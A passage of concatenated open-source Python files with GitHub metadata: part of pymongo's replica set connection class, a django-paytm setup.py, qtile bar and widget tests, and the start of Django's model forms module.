self.__seeds.add(('localhost', 27017))
elif '://' in hosts_or_uri:
res = uri_parser.parse_uri(hosts_or_uri)
self.__seeds.update(res['nodelist'])
username = res['username']
password = res['password']
db_name = res['database']
self.__opts = res['options']
else:
self.__seeds.update(uri_parser.split_hosts(hosts_or_uri))
for option, value in kwargs.iteritems():
option, value = common.validate(option, value)
self.__opts[option] = value
self.__name = self.__opts.get('replicaset')
if not self.__name:
raise ConfigurationError("the replicaSet "
"keyword parameter is required.")
self.__net_timeout = self.__opts.get('sockettimeoutms')
self.__conn_timeout = self.__opts.get('connecttimeoutms')
self.__use_ssl = self.__opts.get('ssl', False)
if self.__use_ssl and not pool.have_ssl:
raise ConfigurationError("The ssl module is not available. If you "
"are using a python version previous to "
"2.6 you must install the ssl package "
"from PyPI.")
super(ReplicaSetConnection, self).__init__(**self.__opts)
if self.slave_okay:
warnings.warn("slave_okay is deprecated. Please "
"use read_preference instead.", DeprecationWarning)
self.refresh()
monitor_thread = Monitor(self)
monitor_thread.setName("ReplicaSetMonitorThread")
monitor_thread.setDaemon(True)
monitor_thread.start()
if db_name and username is None:
warnings.warn("must provide a username and password "
"to authenticate to %s" % (db_name,))
if username:
db_name = db_name or 'admin'
if not self[db_name].authenticate(username, password):
raise ConfigurationError("authentication failed")
def _cached(self, dbname, coll, index):
"""Test if `index` is cached.
"""
cache = self.__index_cache
now = datetime.datetime.utcnow()
return (dbname in cache and
coll in cache[dbname] and
index in cache[dbname][coll] and
now < cache[dbname][coll][index])
def _cache_index(self, dbase, collection, index, ttl):
"""Add an index to the index cache for ensure_index operations.
"""
now = datetime.datetime.utcnow()
expire = datetime.timedelta(seconds=ttl) + now
if dbase not in self.__index_cache:
self.__index_cache[dbase] = {}
self.__index_cache[dbase][collection] = {}
self.__index_cache[dbase][collection][index] = expire
elif collection not in self.__index_cache[dbase]:
self.__index_cache[dbase][collection] = {}
self.__index_cache[dbase][collection][index] = expire
else:
self.__index_cache[dbase][collection][index] = expire
def _purge_index(self, database_name,
collection_name=None, index_name=None):
"""Purge an index from the index cache.
If `index_name` is None purge an entire collection.
If `collection_name` is None purge an entire database.
"""
if not database_name in self.__index_cache:
return
if collection_name is None:
del self.__index_cache[database_name]
return
if not collection_name in self.__index_cache[database_name]:
return
if index_name is None:
del self.__index_cache[database_name][collection_name]
return
if index_name in self.__index_cache[database_name][collection_name]:
del self.__index_cache[database_name][collection_name][index_name]
def _cache_credentials(self, db_name, username, password):
"""Add credentials to the database authentication cache
for automatic login when a socket is created.
If credentials are already cached for `db_name` they
will be replaced.
"""
self.__auth_credentials[db_name] = (username, password)
def _purge_credentials(self, db_name=None):
"""Purge credentials from the database authentication cache.
If `db_name` is None purge credentials for all databases.
"""
if db_name is None:
self.__auth_credentials.clear()
elif db_name in self.__auth_credentials:
del self.__auth_credentials[db_name]
def __check_auth(self, sock, authset):
"""Authenticate using cached database credentials.
If credentials for the 'admin' database are available only
this database is authenticated, since this gives global access.
"""
names = set(self.__auth_credentials.iterkeys())
# Logout from any databases no longer listed in the credentials cache.
for dbname in authset - names:
try:
self.__simple_command(sock, dbname, {'logout': 1})
# TODO: We used this socket to logout. Fix logout so we don't
# have to catch this.
except OperationFailure:
pass
authset.discard(dbname)
# Once logged into the admin database we can access anything.
if "admin" in authset:
return
if "admin" in self.__auth_credentials:
username, password = self.__auth_credentials["admin"]
self.__auth(sock, 'admin', username, password)
authset.add('admin')
else:
for db_name in names - authset:
user, pwd = self.__auth_credentials[db_name]
self.__auth(sock, db_name, user, pwd)
authset.add(db_name)
@property
def seeds(self):
"""The seed list used to connect to this replica set.
"""
return self.__seeds
@property
def hosts(self):
"""All active and passive (priority 0) replica set
members known to this connection. This does not include
hidden or slaveDelay members, or arbiters.
"""
return self.__hosts
@property
def primary(self):
"""The current primary of the replica set.
Returns None if there is no primary.
"""
return self.__writer
@property
def secondaries(self):
"""The secondary members known to this connection.
"""
return set(self.__readers)
@property
def arbiters(self):
"""The arbiters known to this connection.
"""
return self.__arbiters
@property
def max_pool_size(self):
"""The maximum pool size limit set for this connection.
"""
return self.__max_pool_size
def get_document_class(self):
"""document_class getter"""
return self.__document_class
def set_document_class(self, klass):
"""document_class setter"""
self.__document_class = klass
document_class = property(get_document_class, set_document_class,
doc="""Default class to use for documents
returned on this connection.
""")
@property
def tz_aware(self):
"""Does this connection return timezone-aware datetimes?
"""
return self.__tz_aware
@property
def max_bson_size(self):
"""Returns the maximum size BSON object the connected primary
accepts in bytes. Defaults to 4MB in server < 1.7.4. Returns
0 if no primary is available.
"""
if self.__writer:
return self.__pools[self.__writer]['max_bson_size']
return 0
def __simple_command(self, sock, dbname, spec):
"""Send a command to the server.
"""
rqst_id, msg, _ = message.query(0, dbname + '.$cmd', 0, -1, spec)
sock.sendall(msg)
response = self.__recv_msg(1, rqst_id, sock)
response = helpers._unpack_response(response)['data'][0]
msg = "command %r failed: %%s" % spec
helpers._check_command_response(response, None, msg)
return response
def __auth(self, sock, dbname, user, passwd):
"""Authenticate socket `sock` against database `dbname`.
"""
# Get a nonce
response = self.__simple_command(sock, dbname, {'getnonce': 1})
nonce = response['nonce']
key = helpers._auth_key(nonce, user, passwd)
# Actually authenticate
query = SON([('authenticate', 1),
('user', user), ('nonce', nonce), ('key', key)])
self.__simple_command(sock, dbname, query)
def __is_master(self, host):
"""Directly call ismaster.
"""
mongo = pool.Pool(host, self.__max_pool_size,
self.__net_timeout, self.__conn_timeout,
self.__use_ssl)
sock = mongo.get_socket()[0]
response = self.__simple_command(sock, 'admin', {'ismaster': 1})
return response, mongo
def __update_pools(self):
"""Update the mapping of (host, port) pairs to connection pools.
"""
secondaries = []
for host in self.__hosts:
mongo = None
try:
if host in self.__pools:
mongo = self.__pools[host]
sock = self.__socket(mongo)
res = self.__simple_command(sock, 'admin', {'ismaster': 1})
else:
res, conn = self.__is_master(host)
bson_max = res.get('maxBsonObjectSize', MAX_BSON_SIZE)
self.__pools[host] = {'pool': conn,
'last_checkout': time.time(),
'max_bson_size': bson_max}
except (ConnectionFailure, socket.error):
if mongo:
mongo['pool'].discard_socket()
continue
# Only use hosts that are currently in 'secondary' state
# as readers.
if res['secondary']:
secondaries.append(host)
elif res['ismaster']:
self.__writer = host
self.__readers = secondaries
def refresh(self):
"""Iterate through the existing host list, or possibly the
seed list, to update the list of hosts and arbiters in this
replica set.
"""
errors = []
nodes = self.__hosts or self.__seeds
hosts = set()
for node in nodes:
mongo = None
try:
if node in self.__pools:
mongo = self.__pools[node]
sock = self.__socket(mongo)
response = self.__simple_command(sock, 'admin',
{'ismaster': 1})
else:
response, conn = self.__is_master(node)
# Check that this host is part of the given replica set.
set_name = response.get('setName')
# The 'setName' field isn't returned by mongod before 1.6.2
# so we can't assume that if it's missing this host isn't in
# the specified set.
if set_name and set_name != self.__name:
host, port = node
raise ConfigurationError("%s:%d is not a member of "
"replica set %s"
% (host, port, self.__name))
if "arbiters" in response:
self.__arbiters = set([_partition_node(h)
for h in response["arbiters"]])
if "hosts" in response:
hosts.update([_partition_node(h)
for h in response["hosts"]])
if "passives" in response:
hosts.update([_partition_node(h)
for h in response["passives"]])
except (ConnectionFailure, socket.error), why:
if mongo:
mongo['pool'].discard_socket()
errors.append("%s:%d: %s" % (node[0], node[1], str(why)))
if hosts:
self.__hosts = hosts
break
else:
if errors:
raise AutoReconnect(', '.join(errors))
raise ConfigurationError('No suitable hosts found')
self.__update_pools()
def __check_is_primary(self, host):
"""Checks if this host is the primary for the replica set.
"""
try:
mongo = None
if host in self.__pools:
mongo = self.__pools[host]
sock = self.__socket(mongo)
res = self.__simple_command(sock, 'admin', {'ismaster': 1})
else:
res, conn = self.__is_master(host)
bson_max = res.get('maxBsonObjectSize', MAX_BSON_SIZE)
self.__pools[host] = {'pool': conn,
'last_checkout': time.time(),
'max_bson_size': bson_max}
except (ConnectionFailure, socket.error), why:
if mongo:
mongo['pool'].discard_socket()
raise ConnectionFailure("%s:%d: %s" % (host[0], host[1], str(why)))
if res["ismaster"]:
return host
elif "primary" in res:
candidate = _partition_node(res["primary"])
# Don't report the same connect failure multiple times.
try:
return self.__check_is_primary(candidate)
except (ConnectionFailure, socket.error):
pass
raise AutoReconnect('%s:%d: not primary' % host)
def __find_primary(self):
"""Returns a connection to the primary of this replica set,
if one exists.
"""
if self.__writer:
return self.__pools[self.__writer]
# This is either the first connection or we had a failover.
self.refresh()
errors = []
for candidate in self.__hosts:
try:
self.__writer = self.__check_is_primary(candidate)
return self.__pools[self.__writer]
except (ConnectionFailure, socket.error), why:
errors.append(str(why))
# Couldn't find the primary.
raise AutoReconnect(', '.join(errors))
def __socket(self, mongo):
"""Get a socket from the pool.
If it's been > 1 second since the last time we checked out a
socket, we also check to see if the socket has been closed -
        this lets us avoid seeing *some*
:class:`~pymongo.errors.AutoReconnect` exceptions on server
hiccups, etc. We only do this if it's been > 1 second since
the last socket checkout, to keep performance reasonable - we
can't avoid those completely anyway.
"""
sock, authset = mongo['pool'].get_socket()
now = time.time()
if now - mongo['last_checkout'] > 1:
if _closed(sock):
mongo['pool'] = pool.Pool(mongo['pool'].host,
self.__max_pool_size,
self.__net_timeout,
self.__conn_timeout,
self.__use_ssl)
sock, authset = mongo['pool'].get_socket()
mongo['last_checkout'] = now
if self.__auth_credentials or authset:
self.__check_auth(sock, authset)
return sock
def disconnect(self):
"""Disconnect from the replica set primary.
"""
self.__writer = None
def close(self):
"""Disconnect from all set members.
"""
self.__writer = None
self.__pools = {}
def __check_response_to_last_error(self, response):
"""Check a response to a lastError message for errors.
`response` is a byte string representing a response to the message.
If it represents an error response we raise OperationFailure.
Return the response as a document.
"""
response = helpers._unpack_response(response)
assert response["number_returned"] == 1
error = response["data"][0]
helpers._check_command_response(error, self.disconnect)
error_msg = error.get("err", "")
if error_msg is None:
return error
if error_msg.startswith("not master"):
self.disconnect()
raise AutoReconnect(error_msg)
if "code" in error:
if error["code"] in [11000, 11001, 12582]:
raise DuplicateKeyError(error["err"])
else:
raise OperationFailure(error["err"], error["code"])
else:
raise OperationFailure(error["err"])
def __recv_data(self, length, sock):
"""Lowest level receive operation.
Takes length to receive and repeatedly calls recv until able to
return a buffer of that length, raising ConnectionFailure on error.
"""
chunks = []
while length:
chunk = sock.recv(length)
if chunk == "":
raise ConnectionFailure("connection closed")
length -= len(chunk)
chunks.append(chunk)
return "".join(chunks)
def __recv_msg(self, operation, request_id, sock):
"""Receive a message in response to `request_id` on `sock`.
Returns the response data with the header removed.
"""
header = self.__recv_data(16, sock)
length = struct.unpack("<i", header[:4])[0]
resp_id = struct.unpack("<i", header[8:12])[0]
assert resp_id == request_id, "ids don't match %r %r" % (resp_id,
request_id)
assert operation == struct.unpack("<i", header[12:])[0]
return self.__recv_data(length - 16, sock)
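    # Wire-format note (added for clarity): the 16-byte MongoDB message header is
    #   <messageLength:int32><requestID:int32><responseTo:int32><opCode:int32>
    # in little-endian order, which is why the total length is read from
    # header[:4], the matching request id from header[8:12] and the op code
    # from header[12:].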
def __check_bson_size(self, msg, max_size):
"""Make sure the message doesn't include BSON documents larger
than the connected server will accept.
:Parameters:
- `msg`: message to check
"""
if len(msg) == 3:
request_id, data, max_doc_size = msg
if max_doc_size > max_size:
raise InvalidDocument("BSON document too large (%d bytes)"
" - the connected server supports"
" BSON document sizes up to %d"
" bytes." %
(max_doc_size, max_size))
return (request_id, data)
# get_more and kill_cursors messages
# don't include BSON documents.
return msg
def _send_message(self, msg, safe=False, _connection_to_use=None):
"""Say something to Mongo.
Raises ConnectionFailure if the message cannot be sent. Raises
OperationFailure if `safe` is ``True`` and the
response to the getLastError call returns an error. Return the
response from lastError, or ``None`` if `safe` is ``False``.
:Parameters:
- `msg`: message to send
- `safe`: check getLastError status after sending the message
"""
if _connection_to_use in (None, -1):
mongo = self.__find_primary()
else:
mongo = self.__pools[_connection_to_use]
try:
sock = self.__socket(mongo)
rqst_id, data = self.__check_bson_size(msg,
mongo['max_bson_size'])
sock.sendall(data)
# Safe mode. We pack the message together with a lastError
# message and send both. We then get the response (to the
# lastError) and raise OperationFailure if it is an error
# response.
if safe:
response = self.__recv_msg(1, rqst_id, sock)
return self.__check_response_to_last_error(response)
return None
        except (ConnectionFailure, socket.error), why:
mongo['pool'].discard_socket()
if _connection_to_use in (None, -1):
self.disconnect()
raise AutoReconnect(str(why))
except:
mongo['pool'].discard_socket()
raise
mongo['pool'].return_socket()
def __send_and_receive(self, mongo, msg, **kwargs):
"""Send a message on the given socket and return the response data.
"""
try:
sock = self.__socket(mongo)
if "network_timeout" in kwargs:
sock.settimeout(kwargs['network_timeout'])
rqst_id, data = self.__check_bson_size(msg,
mongo['max_bson_size'])
sock.sendall(data)
response = self.__recv_msg(1, rqst_id, sock)
if "network_timeout" in kwargs:
sock.settimeout(self.__net_timeout)
mongo['pool'].return_socket()
return response
except (ConnectionFailure, socket.error), why:
host, port = mongo['pool'].host
mongo['pool'].discard_socket()
raise AutoReconnect("%s:%d: %s" % (host, port, str(why)))
except:
mongo['pool'].discard_socket()
raise
def _send_message_with_response(self, msg, _connection_to_use=None,
_must_use_master=False, **kwargs):
"""Send a message to Mongo and return the response.
Sends the given message and returns the response.
:Parameters:
- `msg`: (request_id, data) pair making up the message to send
"""
read_pref = kwargs.get('read_preference', ReadPreference.PRIMARY)
mongo = None
try:
if _connection_to_use is not None:
if _connection_to_use == -1:
mongo = self.__find_primary()
else:
mongo = self.__pools[_connection_to_use]
return mongo['pool'].host, self.__send_and_receive(mongo,
msg,
**kwargs)
elif _must_use_master or not read_pref:
mongo = self.__find_primary()
return mongo['pool'].host, self.__send_and_receive(mongo,
msg,
**kwargs)
except AutoReconnect:
if mongo == self.__writer:
self.disconnect()
raise
errors = []
for host in helpers.shuffled(self.__readers):
try:
mongo = self.__pools[host]
return host, self.__send_and_receive(mongo, msg, **kwargs)
except AutoReconnect, why:
errors.append(str(why))
# Fallback to primary
if read_pref == ReadPreference.SECONDARY:
try:
mongo = self.__find_primary()
return mongo['pool'].host, self.__send_and_receive(mongo,
msg,
**kwargs)
except AutoReconnect, why:
self.disconnect()
errors.append(why)
raise AutoReconnect(', '.join(errors))
def __cmp__(self, other):
# XXX: Implement this?
return NotImplemented
def __repr__(self):
return "ReplicaSetConnection(%r)" % (["%s:%d" % n
for n in self.__hosts],)
def __getattr__(self, name):
"""Get a database by name.
Raises :class:`~pymongo.errors.InvalidName` if an invalid
database name is used.
:Parameters:
- `name`: the name of the database to get
"""
return database.Database(self, name)
def __getitem__(self, name):
"""Get a database by name.
Raises :class:`~pymongo.errors.InvalidName` if an invalid
database name is used.
:Parameters:
- `name`: the name of the database to get
"""
return self.__getattr__(name)
def close_cursor(self, cursor_id, _conn_id):
"""Close a single database cursor.
Raises :class:`TypeError` if `cursor_id` is not an instance of
``(int, long)``. What closing the cursor actually means
depends on this connection's cursor manager.
:Parameters:
- `cursor_id`: id of cursor to close
"""
if not isinstance(cursor_id, (int, long)):
raise TypeError("cursor_id must be an instance of (int, long)")
self._send_message(message.kill_cursors([cursor_id]),
_connection_to_use=_conn_id)
def server_info(self):
"""Get information about the MongoDB primary we're connected to.
"""
return self.admin.command("buildinfo")
def database_names(self):
"""Get a list of the names of all databases on the connected server.
"""
return [db["name"] for db in
self.admin.command("listDatabases")["databases"]]
def drop_database(self, name_or_database):
"""Drop a database.
Raises :class:`TypeError` if `name_or_database` is not an instance of
``(str, unicode, Database)``
:Parameters:
- `name_or_database`: the name of a database to drop, or a
:class:`~pymongo.database.Database` instance representing the
database to drop
"""
name = name_or_database
if isinstance(name, database.Database):
name = name.name
if not isinstance(name, basestring):
raise TypeError("name_or_database must be an instance of "
"(Database, str, unicode)")
self._purge_index(name)
self[name].command("dropDatabase")
def copy_database(self, from_name, to_name,
from_host=None, username=None, password=None):
"""Copy a database, potentially from another host.
Raises :class:`TypeError` if `from_name` or `to_name` is not
an instance of :class:`basestring`. Raises
:class:`~pymongo.errors.InvalidName` if `to_name` is not a
valid database name.
If `from_host` is ``None`` the current host is used as the
source. Otherwise the database is copied from `from_host`.
If the source database requires authentication, `username` and
`password` must be specified.
:Parameters:
- `from_name`: the name of the source database
- `to_name`: the name of the target database
- `from_host` (optional): host name to copy from
- `username` (optional): username for source database
- `password` (optional): password for source database
.. note:: Specifying `username` and `password` requires server
version **>= 1.3.3+**.
"""
if not isinstance(from_name, basestring):
raise TypeError("from_name must be an instance of basestring")
if not isinstance(to_name, basestring):
raise TypeError("to_name must be an instance of basestring")
database._check_name(to_name)
command = {"fromdb": from_name, "todb": to_name}
if from_host is not None:
command["fromhost"] = from_host
if username is not None:
nonce = self.admin.command("copydbgetnonce",
fromhost=from_host)["nonce"]
command["username"] = username
command["nonce"] = nonce
command["key"] = helpers._auth_key(nonce, username, password)
return self.admin.command("copydb", **command)
| {
"content_hash": "c229b5d95310ca1f41936d788c269ae1",
"timestamp": "",
"source": "github",
"line_count": 929,
"max_line_length": 79,
"avg_line_length": 37.853606027987084,
"alnum_prop": 0.5409202070181425,
"repo_name": "couchbaselabs/litmus",
"id": "750745b411eaff6f2105282151837db6864791c6",
"size": "35745",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "lib/pymongo/replica_set_connection.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "103452"
},
{
"name": "CSS",
"bytes": "15530"
},
{
"name": "JavaScript",
"bytes": "713886"
},
{
"name": "Python",
"bytes": "1336652"
}
],
"symlink_target": ""
} |
import os
from setuptools import find_packages, setup
with open(os.path.join(os.path.dirname(__file__), 'README.rst')) as readme:
README = readme.read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name='django-paytm',
version='0.1',
packages=find_packages(),
include_package_data=True,
license='BSD License', # example license
description='A simple Django app to conduct payment using Paytm.',
long_description=README,
author='Naresh Chaudhary',
author_email='[email protected]',
classifiers=[
'Environment :: Web Environment',
'Framework :: Django',
'Framework :: Django :: 1.8',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
# Replace these appropriately if you are stuck on Python 2.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
    install_requires=[
"backports.shutil-get-terminal-size==1.0.0",
"decorator==4.0.10",
"enum34==1.1.6",
"ipython-genutils==0.1.0",
"pathlib2==2.1.0",
"pexpect==4.2.1",
"pickleshare==0.7.4",
"prompt-toolkit==1.0.9",
"ptyprocess==0.5.1",
"pycrypto==2.6.1",
"Pygments==2.1.3",
"simplegeneric==0.8.1",
"traitlets==4.3.1",
"wcwidth==0.1.7"
]
) | {
"content_hash": "db35477dd42a98d3ad7c50715ea78c02",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 78,
"avg_line_length": 32.31372549019608,
"alnum_prop": 0.5843446601941747,
"repo_name": "nareshchaudhary37/django-paytm",
"id": "e8164f5900bdff3ef906da86c67f7340eaf9b840",
"size": "1648",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "HTML",
"bytes": "588"
},
{
"name": "Python",
"bytes": "11406"
}
],
"symlink_target": ""
} |
import pytest
import libqtile.layout
import libqtile.bar
import libqtile.widget
import libqtile.config
import libqtile.confreader
class GBConfig:
auto_fullscreen = True
keys = []
mouse = []
groups = [
libqtile.config.Group("a"),
libqtile.config.Group("bb"),
libqtile.config.Group("ccc"),
libqtile.config.Group("dddd"),
libqtile.config.Group("Pppy")
]
layouts = [libqtile.layout.stack.Stack(num_stacks=1)]
floating_layout = libqtile.layout.floating.Floating()
screens = [
libqtile.config.Screen(
top=libqtile.bar.Bar(
[
libqtile.widget.CPUGraph(
width=libqtile.bar.STRETCH,
type="linefill",
border_width=20,
margin_x=1,
margin_y=1
),
libqtile.widget.MemoryGraph(type="line"),
libqtile.widget.SwapGraph(type="box"),
libqtile.widget.TextBox(name="text",
background="333333"),
],
50,
),
bottom=libqtile.bar.Bar(
[
libqtile.widget.GroupBox(),
libqtile.widget.AGroupBox(),
libqtile.widget.Prompt(),
libqtile.widget.WindowName(),
libqtile.widget.Sep(),
libqtile.widget.Clock(),
],
50
),
# TODO: Add vertical bars and test widgets that support them
)
]
main = None
gb_config = pytest.mark.parametrize("qtile", [GBConfig], indirect=True)
def test_completion():
c = libqtile.widget.prompt.CommandCompleter(None, True)
c.reset()
c.lookup = [
("a", "x/a"),
("aa", "x/aa"),
]
assert c.complete("a") == "a"
assert c.actual() == "x/a"
assert c.complete("a") == "aa"
assert c.complete("a") == "a"
c = libqtile.widget.prompt.CommandCompleter(None)
r = c.complete("l")
assert c.actual().endswith(r)
c.reset()
assert c.complete("/bi") == "/bin/"
c.reset()
assert c.complete("/bin") != "/bin/"
c.reset()
assert c.complete("~") != "~"
c.reset()
s = "thisisatotallynonexistantpathforsure"
assert c.complete(s) == s
assert c.actual() == s
c.reset()
@gb_config
def test_draw(qtile):
qtile.test_window("one")
b = qtile.c.bar["bottom"].info()
assert b["widgets"][0]["name"] == "groupbox"
@gb_config
def test_prompt(qtile):
assert qtile.c.widget["prompt"].info()["width"] == 0
qtile.c.spawncmd(":")
qtile.c.widget["prompt"].fake_keypress("a")
qtile.c.widget["prompt"].fake_keypress("Tab")
qtile.c.spawncmd(":")
qtile.c.widget["prompt"].fake_keypress("slash")
qtile.c.widget["prompt"].fake_keypress("Tab")
@gb_config
def test_event(qtile):
qtile.c.group["bb"].toscreen()
@gb_config
def test_textbox(qtile):
assert "text" in qtile.c.list_widgets()
s = "some text"
qtile.c.widget["text"].update(s)
assert qtile.c.widget["text"].get() == s
s = "Aye, much longer string than the initial one"
qtile.c.widget["text"].update(s)
assert qtile.c.widget["text"].get() == s
qtile.c.group["Pppy"].toscreen()
qtile.c.widget["text"].set_font(fontsize=12)
@gb_config
def test_textbox_errors(qtile):
qtile.c.widget["text"].update(None)
qtile.c.widget["text"].update("".join(chr(i) for i in range(255)))
qtile.c.widget["text"].update("V\xE2r\xE2na\xE7\xEE")
qtile.c.widget["text"].update("\ua000")
@gb_config
def test_groupbox_button_press(qtile):
qtile.c.group["ccc"].toscreen()
assert qtile.c.groups()["a"]["screen"] is None
qtile.c.bar["bottom"].fake_button_press(0, "bottom", 10, 10, 1)
assert qtile.c.groups()["a"]["screen"] == 0
class GeomConf:
auto_fullscreen = False
main = None
keys = []
mouse = []
groups = [
libqtile.config.Group("a"),
libqtile.config.Group("b"),
libqtile.config.Group("c"),
libqtile.config.Group("d")
]
layouts = [libqtile.layout.stack.Stack(num_stacks=1)]
floating_layout = libqtile.layout.floating.Floating()
screens = [
libqtile.config.Screen(
top=libqtile.bar.Bar([], 10),
bottom=libqtile.bar.Bar([], 10),
left=libqtile.bar.Bar([], 10),
right=libqtile.bar.Bar([], 10),
)
]
geom_config = pytest.mark.parametrize("qtile", [GeomConf], indirect=True)
class DBarH(libqtile.bar.Bar):
def __init__(self, widgets, size):
libqtile.bar.Bar.__init__(self, widgets, size)
self.horizontal = True
class DBarV(libqtile.bar.Bar):
def __init__(self, widgets, size):
libqtile.bar.Bar.__init__(self, widgets, size)
self.horizontal = False
class DWidget:
def __init__(self, length, length_type):
self.length, self.length_type = length, length_type
@geom_config
def test_geometry(qtile):
qtile.test_xeyes()
g = qtile.c.screens()[0]["gaps"]
assert g["top"] == (0, 0, 800, 10)
assert g["bottom"] == (0, 590, 800, 10)
assert g["left"] == (0, 10, 10, 580)
assert g["right"] == (790, 10, 10, 580)
assert len(qtile.c.windows()) == 1
geom = qtile.c.windows()[0]
assert geom["x"] == 10
assert geom["y"] == 10
assert geom["width"] == 778
assert geom["height"] == 578
internal = qtile.c.internal_windows()
assert len(internal) == 4
wid = qtile.c.bar["bottom"].info()["window"]
assert qtile.c.window[wid].inspect()
@geom_config
def test_resize(qtile):
def wd(l):
return [i.length for i in l]
def offx(l):
return [i.offsetx for i in l]
def offy(l):
return [i.offsety for i in l]
for DBar, off in ((DBarH, offx), (DBarV, offy)): # noqa: N806
b = DBar([], 100)
dwidget_list = [
DWidget(10, libqtile.bar.CALCULATED),
DWidget(None, libqtile.bar.STRETCH),
DWidget(None, libqtile.bar.STRETCH),
DWidget(10, libqtile.bar.CALCULATED),
]
b._resize(100, dwidget_list)
assert wd(dwidget_list) == [10, 40, 40, 10]
assert off(dwidget_list) == [0, 10, 50, 90]
b._resize(101, dwidget_list)
assert wd(dwidget_list) == [10, 40, 41, 10]
assert off(dwidget_list) == [0, 10, 50, 91]
dwidget_list = [
DWidget(10, libqtile.bar.CALCULATED)
]
b._resize(100, dwidget_list)
assert wd(dwidget_list) == [10]
assert off(dwidget_list) == [0]
dwidget_list = [
DWidget(10, libqtile.bar.CALCULATED),
DWidget(None, libqtile.bar.STRETCH)
]
b._resize(100, dwidget_list)
assert wd(dwidget_list) == [10, 90]
assert off(dwidget_list) == [0, 10]
dwidget_list = [
DWidget(None, libqtile.bar.STRETCH),
DWidget(10, libqtile.bar.CALCULATED),
]
b._resize(100, dwidget_list)
assert wd(dwidget_list) == [90, 10]
assert off(dwidget_list) == [0, 90]
dwidget_list = [
DWidget(10, libqtile.bar.CALCULATED),
DWidget(None, libqtile.bar.STRETCH),
DWidget(10, libqtile.bar.CALCULATED),
]
b._resize(100, dwidget_list)
assert wd(dwidget_list) == [10, 80, 10]
assert off(dwidget_list) == [0, 10, 90]
class ExampleWidget(libqtile.widget.base._Widget):
orientations = libqtile.widget.base.ORIENTATION_HORIZONTAL
def __init__(self):
libqtile.widget.base._Widget.__init__(self, 10)
def draw(self):
pass
class IncompatibleWidgetConf:
main = None
keys = []
mouse = []
groups = [libqtile.config.Group("a")]
layouts = [libqtile.layout.stack.Stack(num_stacks=1)]
floating_layout = libqtile.layout.floating.Floating()
screens = [
libqtile.config.Screen(
left=libqtile.bar.Bar(
[
# This widget doesn't support vertical orientation
ExampleWidget(),
],
10
),
)
]
def test_incompatible_widget(qtile_nospawn):
config = IncompatibleWidgetConf
# Ensure that adding a widget that doesn't support the orientation of the
# bar raises ConfigError
with pytest.raises(libqtile.confreader.ConfigError):
qtile_nospawn.create_manager(config)
class MultiStretchConf:
main = None
keys = []
mouse = []
groups = [libqtile.config.Group("a")]
layouts = [libqtile.layout.stack.Stack(num_stacks=1)]
floating_layout = libqtile.layout.floating.Floating()
screens = [
libqtile.config.Screen(
top=libqtile.bar.Bar(
[
libqtile.widget.Spacer(libqtile.bar.STRETCH),
libqtile.widget.Spacer(libqtile.bar.STRETCH),
],
10
),
)
]
def test_multiple_stretches(qtile_nospawn):
config = MultiStretchConf
# Ensure that adding two STRETCH widgets to the same bar raises ConfigError
with pytest.raises(libqtile.confreader.ConfigError):
qtile_nospawn.create_manager(config)
def test_basic(qtile_nospawn):
config = GeomConf
config.screens = [
libqtile.config.Screen(
bottom=libqtile.bar.Bar(
[
ExampleWidget(),
libqtile.widget.Spacer(libqtile.bar.STRETCH),
ExampleWidget()
],
10
)
)
]
qtile_nospawn.start(config)
i = qtile_nospawn.c.bar["bottom"].info()
assert i["widgets"][0]["offset"] == 0
assert i["widgets"][1]["offset"] == 10
assert i["widgets"][1]["width"] == 780
assert i["widgets"][2]["offset"] == 790
libqtile.hook.clear()
def test_singlespacer(qtile_nospawn):
config = GeomConf
config.screens = [
libqtile.config.Screen(
bottom=libqtile.bar.Bar(
[
libqtile.widget.Spacer(libqtile.bar.STRETCH),
],
10
)
)
]
qtile_nospawn.start(config)
i = qtile_nospawn.c.bar["bottom"].info()
assert i["widgets"][0]["offset"] == 0
assert i["widgets"][0]["width"] == 800
libqtile.hook.clear()
def test_nospacer(qtile_nospawn):
config = GeomConf
config.screens = [
libqtile.config.Screen(
bottom=libqtile.bar.Bar(
[
ExampleWidget(),
ExampleWidget()
],
10
)
)
]
qtile_nospawn.start(config)
i = qtile_nospawn.c.bar["bottom"].info()
assert i["widgets"][0]["offset"] == 0
assert i["widgets"][1]["offset"] == 10
libqtile.hook.clear()
| {
"content_hash": "d3b7ab9489f16255425950c50fe42e38",
"timestamp": "",
"source": "github",
"line_count": 400,
"max_line_length": 79,
"avg_line_length": 27.58,
"alnum_prop": 0.5492204496011602,
"repo_name": "frostidaho/qtile",
"id": "b5f5c63d53f342bfd38b900ba25120770eb78538",
"size": "12270",
"binary": false,
"copies": "2",
"ref": "refs/heads/ida_dev2",
"path": "test/test_bar.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "1639"
},
{
"name": "Python",
"bytes": "1179470"
},
{
"name": "Roff",
"bytes": "3605"
},
{
"name": "Shell",
"bytes": "7180"
}
],
"symlink_target": ""
} |
"""
Helper functions for creating Form classes from Django models
and database field objects.
"""
from collections import OrderedDict
from itertools import chain
from django.core.exceptions import (
NON_FIELD_ERRORS, FieldError, ImproperlyConfigured, ValidationError,
)
from django.forms.fields import ChoiceField, Field
from django.forms.forms import BaseForm, DeclarativeFieldsMetaclass
from django.forms.formsets import BaseFormSet, formset_factory
from django.forms.utils import ErrorList
from django.forms.widgets import (
HiddenInput, MultipleHiddenInput, SelectMultiple,
)
from django.utils.text import capfirst, get_text_list
from django.utils.translation import gettext, gettext_lazy as _
__all__ = (
'ModelForm', 'BaseModelForm', 'model_to_dict', 'fields_for_model',
'ModelChoiceField', 'ModelMultipleChoiceField', 'ALL_FIELDS',
'BaseModelFormSet', 'modelformset_factory', 'BaseInlineFormSet',
'inlineformset_factory', 'modelform_factory',
)
ALL_FIELDS = '__all__'
def construct_instance(form, instance, fields=None, exclude=None):
"""
Construct and return a model instance from the bound ``form``'s
``cleaned_data``, but do not save the returned instance to the database.
"""
